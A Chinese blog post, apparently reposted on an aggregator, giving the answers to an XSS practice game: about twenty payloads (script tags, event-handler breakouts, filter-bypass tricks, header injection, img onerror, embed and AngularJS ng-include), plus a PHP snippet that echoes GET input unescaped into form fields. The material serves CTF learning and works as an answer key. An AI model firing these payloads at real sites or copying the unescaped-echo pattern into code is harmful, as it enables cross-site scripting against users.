路径

路径

关注
发信
数据库避免插入重读的数据
TCP delay ack机制和实现
消息队列kafka
LFS linux的安装过程
CentOS7安装MySQL(完整版)
Linux-JDK安装
冷知识点:COLLATE 关键字是什么意思?
树结构的应用
L2-031 深入虎穴 (25分)
Faker伪数据生成
Angular入门,开发环境搭建,使用Angular CLI创建你的第一个Angular项目
Socket编程
学习python-条件判断
JUC-7-lock接口
vue组件name的作用小结

Xss小游戏通关-payload(相关技巧)

扫码查看

xss

小游戏答案

url:http://test.ctf8.com/level1.php?name=test

payload:

  1. <script>alert("'test'")</script>
  2. "><script>alert("'test'")</script>
  3. ' onclick=alert("'test'") '
  4. " onclick=alert("'test'") "
  5. "><a href=javascript:alert("'test'")>test</a>
  6. "><scRipt>alert("'test'")</sCript>
  7. "><scriscriptpt>alert("'test'")</scriscriptpt>
  8. javasc&#x72;ipt:alert(1)
  9. javasc&#x72;ipt:alert(1)/* http://test*/
  10. ?keyword=123&t_link=123&t_history=123&t_sort=test" onclick=alert("'test'") type="text
  11. Referer: test" onclick=alert("'test'") type="text
  12. User-Agent:test" onclick=alert("'test'") type="text
  13. Cookie: user=test" onclick=alert("'test'") type="text
  14. 据说是一个图片中的exif信息,但是网址已失效;
  15. level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
  16. level16.php?keyword=<img%0asrc=x%0aonerror=alert("'test'")>
  17. level17.php?arg01=a&arg02= onmouseover=alert("'test'")
  18. level18.php?arg01= onmouseover=alert("'test'")&arg02=b
  19. flash xss
  20. flash xss

页面提交参数的方式:

源码:get.php

<?php
echo "<h2>php变量提交get参数:</h2>";
$str = $_GET["name"];
$str2 = $_GET["sex"];
echo "<h2>form表单提交get参数</h2>".'
<center>
<form id=form>
<p>姓名:</p><input name="name"  value="'.'" type="text">
<p>input通过php接收姓名参数:</p><input name="form"  value="'.$str.'" type="text">
<p>直接接收php性别参数</p><input name="form2"  value="'.$str2.'" type="text">
<input type="submit" value="提交"/>
</form>
</center>';
?>

url中显示的参数:?name=xiaoming&form=&form2=

未显示参数:&sex=

除了通过php传递,还可通过js传递;

能显示在url中的参数之后form表单中name属性定义的,php定义的需要手动添加,或者链接到form表单上;

技巧

编码网站:http://monyer.com/demo/monyerjs/

<embed>标签

embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。

支持事件属性;

弹窗方式:

<embed src=level16.png onmouseover=alert(1) width=100% heigth=100%>

<embed src=son.html onmouseover=alert(1) width=100% heigth=100%>

AngularJS中的ng-include

  1. 是否是在服务器上运行的。(注意不是服务器上,直接打开HTML文件是不行的)
  2. 文件路径是否对,如果是同一文件夹中,这样写:(注意其中的“”中间还有个‘’)
  3. ng-controller="myCtrl"是不是正确,如果没有对应的controller
  4. 组件<script src="http://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script>

fath.html内容:

<head>
        <meta charset="utf-8">
        <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>
</head>
<body>
    <div ng-include="'son.html'"></div>
    <!-- 路径里面必须带上单引号 -->
    <!-- 注意:如果 ng-controller没有对应的方法,就不要写了,会报错-->
</body>

son.html内容:

Hello world

服务器端访问fath.html;

数据一次完整的编码解码过程:

12-24 13:45
查看更多
Powered by LMLPHP ©2025 路径 0.052734